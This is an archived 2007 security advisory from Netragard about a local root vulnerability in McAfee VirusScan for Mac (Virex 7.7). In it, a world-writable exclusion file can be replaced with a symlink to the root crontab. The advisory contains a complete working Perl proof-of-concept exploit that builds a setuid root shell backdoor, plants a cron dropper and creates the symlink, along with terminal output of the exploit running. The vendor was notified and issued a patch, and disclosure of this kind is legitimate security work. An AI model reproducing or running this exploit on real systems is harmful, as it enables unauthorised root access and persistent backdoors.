Netragard Security Advisory 2007-02-20

2007-03-06T00:00:00
ID PACKETSTORM:54808
Type packetstorm
Reporter Kevin Finisterre
Modified 2007-03-06T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
******************** Netragard, L.L.C Advisory* *******************  
  
  
Strategic Reconnaissance Team  
  
------------------------------------------------  
http://www.netragard.com -- "We make I.T. Safe."  
  
  
  
  
  
[POSTING NOTICE]  
- -----------------------------------------------------------------------  
If you intend to post this advisory on your web page please create a  
clickable link back to the original Netragard advisory as the contents  
of the advisory may be updated.  
  
<a href=http://www.netragard.com/html/recent_research.html>  
Netragard Research  
</a>  
  
  
  
  
  
[About Netragard]  
- -----------------------------------------------------------------------  
Netragard is a unique I.T. Security company whose services are  
fortified by continual vulnerability research and development. This  
ongoing research, which is performed by our Strategic Reconnaissance  
Team, specifically focuses on Operating Systems, Software Products and  
Web Applications commonly used by businesses internationally. We apply  
the knowledge gained by performing this research to our professional  
security services. This in turn enables us to produce high quality  
deliverables that are the product of talented security professionals  
and not those of automated scanners and tools. This advisory is the  
product of research done by the Strategic Reconnaissance Team.  
  
  
  
  
  
[Advisory Information]  
- -----------------------------------------------------------------------  
Contact : Adriel T. Desautels  
Researcher : Kevin Finisterre  
Advisory ID : NETRAGARD-20070220  
Product Name : McAfee VirusScan for Mac (Virex)  
Product Version : <= Virex 7.7  
Vendor Name : McAfee  
Type of Vulnerability : Local root exploit and Scan Bypass  
Effort : Easy  
  
  
  
[Product Description]  
- -----------------------------------------------------------------------  
Guard your Macintosh systems and users against all types of viruses and  
malicious code, even new unknown threats with McAfee VirusScan for Mac."  
  
- -- http://www.mcafee.com --  
  
  
  
  
  
[Technical Summary]  
- -----------------------------------------------------------------------  
McAfee Virex contains an exploitable feature that enables users to  
define what files should be excluded for scanning. This feature relies  
on a configuration file with insecure privileges and is located in  
/Library/Application Support. Any user on the system can modify or  
delete the configuration file thus affecting what Virex will scan.  
  
A simple example of such a modification would be to echo into the file  
which in turn would cause Virex to ignore all files on the entire system.  
  
  
[Technical Details]  
- -----------------------------------------------------------------------  
An exploitable vulnerability exists in McAfee Virex that can be used to  
gain root privileges on an affected system. This vulnerability exists  
within the feature that enables users to define files for scan exclusion.  
The configuration file used to store scan exclusion files has insecure  
permissions of "rw-rw-rw" and as such can be modified or removed by any  
user.  
  
Upon system boot the VShieldCheck process that runs with root privileges  
verifies the existence of the VShieldExecute.txt file located at:  
  
/Library/Application/Sypport/Virex/VShieldExecute.txt  
  
If VShieldCheck does not find the file at boot then it recreates the  
file with the rw-rw-rw permissions. The exact command that it uses to  
set those permissions is shown below:  
  
SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod  
/bin/chmod a+rw '%s' >/dev/null 2>&1  
  
The VShieldCheck process does not check for symlinks prior to creating  
the VShieldExecute.txt file. If an attacker creates a symlinks to:  
  
/var/cron/tabs/root  
  
from  
  
/Library/Application Support/Virex/VShieldExclude.txt  
  
then the file /var/cron/tabs/root will be created with writable  
permissions by the VShieldCheck process at the next system boot.  
Once the file is created the attacker can insert arbitrary commands  
into the newly created cron file that will be executed with root  
privileges.  
  
Example:  
  
SNOsoft-virexuser$ crontab -l  
crontab: no crontab for virexuser  
SNOsoft-virexuser$ Desktop/pwn_virex.pl  
  
Usage: Desktop/pwn_virex.pl <target>  
  
Targets:  
  
0 . Virex 7.7.dmg  
  
SNOsoft-virexuser$ Desktop/pwn_virex.pl 0  
*** Target: Virex 7.7.dmg "/Library/Application  
Support/Virex/VShieldExclude.txt"  
wait for a reboot a cron run...  
SNOsoft-virexuser$ crontab -l  
* * * * * /usr/bin/perl /Users/Shared/droptab.pl  
SNOsoft-virexuser$ ls -al /Library/Application\ Support/Virex/  
total 88  
drwxrwxr-x 5 root admin 170 Oct 15 22:08 .  
drwxrwxr-x 10 root admin 340 Nov 3 11:11 ..  
lrwxr-xr-x 1 virusbar admin 19 Oct 15 22:08 VShieldExclude.txt  
- -> /var/cron/tabs/root  
- -rwxr-xr-x 1 root wheel 530 Aug 18 2005  
com.mcafee.virex.eupdate.plist  
- -rwxr-xr-x 1 root admin 32813 Aug 18 2005 digest.plist  
  
After a reboot and a cycle of cron there will be a setuid root shell at  
/Users/Shared/shX  
  
  
[Proof Of Concept]  
- -----------------------------------------------------------------------  
  
#!/usr/bin/perl  
#  
# http://www.digitalmunition.com  
# written by kf (kf_lists[at]digitalmunition[dot]com)  
#  
# Following symlinks is bad mmmmmmmmmmkay!  
#  
  
$dest = "/var/cron/tabs/root";  
  
$tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application  
Support/Virex/VShieldExclude.txt\" ";  
  
unless (($target) = @ARGV) {  
print "\n\nUsage: $0 <target> \n\nTargets:\n\n";  
  
foreach $key (sort(keys %tgts)) {  
($a,$b) = split(/\:/,$tgts{"$key"});  
print "\t$key . $a\n";  
}  
  
print "\n";  
exit 1;  
}  
  
($a,$b) = split(/\:/,$tgts{"$target"});  
print "*** Target: $a $b\n";  
  
# Set aside a backdoor that we will chmod and chown later  
open(BD,">/tmp/pwnrex.c");  
printf BD "main()\n";  
printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0);  
system(\"/bin/sh -i\"); }\n";  
#system("gcc -o /Users/Shared/shX /tmp/pwnrex.c");  
system("cp /usr/bin/id /Users/Shared/shX"); # this is for those  
without gcc.  
  
# set aside root crontab dropper  
open(PH,">/Users/Shared/droptab.pl");  
print PH "system\(\"echo \'* * * * * /usr/sbin/chown root:  
/Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\' >  
/var/cron/tabs/root\"\)\;\n";  
  
# rm the existing log file and symlink it to the root crontab file. A  
reboot will be required to exploit this.  
system("rm -rf $b; ln -s $dest $b");  
  
# start up a crontab request that will be *VERY* useful after the  
machine has rebooted.  
system("echo '* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep  
90; crontab /Users/Shared/xxx' >  
/tmp/user_cron");  
system("echo '* * * * * /usr/bin/id' > /Users/Shared/xxx");  
system("crontab /tmp/user_cron");  
  
print "wait for a reboot and a cron run...\n"  
  
  
*** The code above will provide a root shell ***  
  
Note:  
Netragard's SNOsoft Research Team was able to use this issue  
perform privilege escalation and gain root privileges.  
  
  
[Vendor Status]  
- -----------------------------------------------------------------------  
Vendor Notified on 11/06/06  
Vendor Patched on 02/13/07  
Vendor advisory and patch has been posted at the following URL:  
  
https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=  
518722&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=518722  
  
McAfee engineers were very helpful throughout the entire process.  
  
  
[Disclaimer]  
- ----------------------http://www.netragard.com-------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
<a href="http://www.netragard.com>  
http://www.netragard.com  
</a>  
  
  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.5 (Darwin)  
  
iD8DBQFF5LatQwbn1P9Iaa0RAojQAJ9VVWHCVnLDg2yG4KBt1crLC0+5NQCfZFQR  
10JV11ASCMCVdPikVgMDzbk=  
=Z34O  
-----END PGP SIGNATURE-----  
`